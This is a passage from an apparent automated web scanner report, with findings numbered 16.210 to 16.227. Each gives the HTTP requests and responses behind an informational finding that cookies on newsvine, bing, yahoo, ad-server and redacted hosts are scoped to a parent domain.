Path:	/A-List/TV/Reality-show-and-housewives.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=57c44e4f157449418f258835ff8a2157; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=697F387490984D5091A88C7D9264CF7B; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:30 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/TV/Reality-show-and-housewives.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:30 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=57c44e4f157449418f258835ff8a2157; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=697F387490984D5091A88C7D9264CF7B; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:30 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.210. http://specials.redacted/IEIncreaseFont_preview.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/IEIncreaseFont_preview.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=0506a602688945e5ad28ee84c22b5f61; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=80780BE1B7C941D18D9BC03C02043CA7; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:54 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /IEIncreaseFont_preview.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:54 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=0506a602688945e5ad28ee84c22b5f61; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=80780BE1B7C941D18D9BC03C02043CA7; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:54 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.211. http://specials.redacted/alphabet.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/alphabet.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=f2b9f9c8edf64a949f8339bbfbc006f6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=8F837BE9C6D04544883F495E86A13FAC; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:56 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alphabet.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:56 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=f2b9f9c8edf64a949f8339bbfbc006f6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8F837BE9C6D04544883F495E86A13FAC; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:56 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 25485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.212. http://suzanne-choney.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://suzanne-choney.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=6046a552d588b2b1ca9c2098d0a526d4; expires=Sat, 25-Jan-2031 02:19:28 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: suzanne-choney.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.213. http://technolog2.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog2.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=4d47ba7c4a967234cfe2368b17e3e89b; expires=Sat, 25-Jan-2031 02:53:12 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: technolog2.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.214. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ac1=51f37.61f6d=0129111951; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0|c51F37:61F6D_0_0_0_20BC47_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 01:51:08 GMT
Location: http://search.mylife.com/wp-people/?s_cid=DIS70b79249d87148edb59e29f186dfc0b753aa0a7422bf4444a8f1fff785ffedf1
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ac1=51f37.61f6d=0129111951; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0|c51F37:61F6D_0_0_0_20BC47_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 30 Jan 2011 01:51:08 GMT
Content-Length: 226
Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:56:08 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://search.mylife.com/wp-people/?s_cid=DIS70b79249d87148edb59e29f186dfc0b753aa0a7422bf4444a8f1fff785ffedf1">here</
...[SNIP]...

16.215. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396875340721; ts=1/29/2011+12:42:58+AM; z=4; sid=43118469-708a-43ea-a596-af6467b86b10; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 30 Jan 2011 01:29:45 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 30 Jan 2011 01:29:44 GMT
Content-Length: 43
Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:34:45 GMT;path=/

GIF89a.............!.......,...........D..;

16.216. http://toddkenreck.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://toddkenreck.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=c66a118e1fcbecd5b536a96e40929013; expires=Sat, 25-Jan-2031 02:57:39 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: toddkenreck.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.217. http://top.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://top.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=91e5bf02a7007c2a6827929e99162d52; expires=Sat, 25-Jan-2031 03:00:36 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: top.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.218. http://top.newsvine.com/users previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://top.newsvine.com
Path:	/users

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=a08b4d7ef3970ad6780f87b910dbac7c; expires=Sat, 25-Jan-2031 02:58:16 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /users HTTP/1.1
Host: top.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.219. http://tv.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.redacted
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=dfa3666ab2b24263815b585d8424c2c2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: tv.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.220. http://tv.redacted/tv/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.redacted
Path:	/tv/article.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=62ae4f15c8c0486a828bffcaa09140f2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tv/article.aspx?news=625552&gt1=28103 HTTP/1.1
Host: tv.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.221. http://us.mc1125.mail.yahoo.com/mc/compose previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.mc1125.mail.yahoo.com
Path:	/mc/compose

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

B=eb61ua56k9fa0&b=3&s=19; expires=Tue, 29-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mc/compose HTTP/1.1
Host: us.mc1125.mail.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:08 GMT
Set-Cookie: B=eb61ua56k9fa0&b=3&s=19; expires=Tue, 29-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://login.yahoo.com?.src=ym&.done=http%3A%2F%2Fus.mc1125.mail.yahoo.com%2Fmc%2Fcompose
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private
Age: 0
Connection: close
Via: HTTP/1.1 r17.ycpi.ac4.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5

16.222. http://redcated/CNT/iview/299297287/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/299297287/direct

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

AA002=001296343597-3954973; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CNT/iview/299297287/direct;pc.106028736;wi.300;hi.120/01?click= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: MUID=AD04D6F8B2FF44629973BD0674351135

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 261
Content-Type: text/html
Expires: 0
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296343597-3954973; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 29 Jan 2011 23:26:37 GMT

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/199711109/299297287/direct;pc.106028736;wi.300;hi.120/01" onclick="(new Image).src='http://t.redcated'"><img src="http://ec.a
...[SNIP]...

16.223. http://wbenedetti.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wbenedetti.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=37e0e82eb5225aaf39e58b2c59ea3714; expires=Sat, 25-Jan-2031 03:05:09 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: wbenedetti.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.224. http://www.bing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=116E16B4881F4F76A93BF81949677C2F; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca7a8f284da884884a06f8cb36768c20c; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 28803
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:03 GMT
Connection: close
Set-Cookie: _SS=SID=116E16B4881F4F76A93BF81949677C2F; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca7a8f284da884884a06f8cb36768c20c; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...

16.225. http://www.bing.com/challenge previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/challenge

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_FP=BDCE=129409675061634862&BDCEH=4B00CE098126B4CE6DFFB8D547F7B893; expires=Tue, 29-Jan-2013 17:11:46 GMT; domain=.bing.com; path=/
_HOP=I=1&TS=1296407506; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /challenge HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/challenge
Cache-Control: max-age=0
Origin: http://www.bing.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178; RMS=F=O; MUID=DC63BAA44C3843F38378B4BB213E0A6F; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=SM=1&MS=1621031&D=1593447&AF=NOFORM
Content-Length: 210

encanswer=E376D841E2A5505191B255EB573C7490ECAC704AF7599F66EF723B9ACE4866E711F100C9257803D4E056382B5EA70E8F&query=%252fvideos%252fresults.aspx&IG=83a9fd7913fd45e19c7f20da5201b519&useranswer=9zem2&submi
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Content-Type: text/html; charset=utf-8
Location: /videos/results.aspx
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 17:11:46 GMT
Connection: close
Set-Cookie: _FP=BDCE=129409675061634862&BDCEH=4B00CE098126B4CE6DFFB8D547F7B893; expires=Tue, 29-Jan-2013 17:11:46 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1296407506; domain=.bing.com; path=/

16.226. http://www.bing.com/events/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/events/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=712D1F94FAED4E98B6E572C9C51BBEF4; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:30 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /events/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:30 GMT
Connection: close
Set-Cookie: _SS=SID=712D1F94FAED4E98B6E572C9C51BBEF4; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:30 GMT; domain=.bing.com; path=/

Ref A: B2575C613A604708B56E80B00C179519 Ref B: F3576EA2ACED896FAE6E8179524B8516 Ref C: Sat Jan 29 15:53:30 2011
PST

16.227. http://www.bing.com/fd/ls/GLinkPing.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/fd/ls/GLinkPing.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=SM=1&MS=1621031&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:11:14 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/ls/GLinkPing.aspx?CM=TMF&IG=9874d115203d4525a6dc5f12136077f0&CID=F741A5D3C8544F77A0B57D8439E7E06E HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/results.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
